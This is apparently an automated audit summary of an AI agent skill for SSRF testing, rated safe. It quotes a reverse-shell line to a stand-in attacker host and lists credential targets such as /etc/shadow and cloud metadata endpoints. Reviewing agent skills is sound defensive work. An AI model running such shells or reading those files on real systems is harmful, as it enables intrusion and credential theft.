ssrf-server-side-request-forgery

Pass

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: SAFECOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The skill documents several attack chains that result in remote command execution on vulnerable target systems. This includes detailed payloads for Redis exploitation via the Gopher protocol that write crontab entries to execute reverse shells (e.g., bash -i >& /dev/tcp/attacker.com/4444). These strings are provided as static educational examples for the agent's reference during security testing and are not instructions for the agent to execute commands on its own environment.
  • [DATA_EXFILTRATION]: The playbook catalogs a wide array of sensitive data targets for exfiltration during an SSRF vulnerability assessment. This includes local file system paths like /etc/passwd and /etc/shadow, as well as a complete catalog of cloud metadata endpoints for AWS, Azure, Google Cloud, Alibaba, and others. These references are used to teach the agent how to demonstrate the impact of SSRF by accessing instance credentials or internal configuration files.
Audit Metadata
Risk Level
SAFE
Analyzed
Apr 22, 2026, 05:03 PM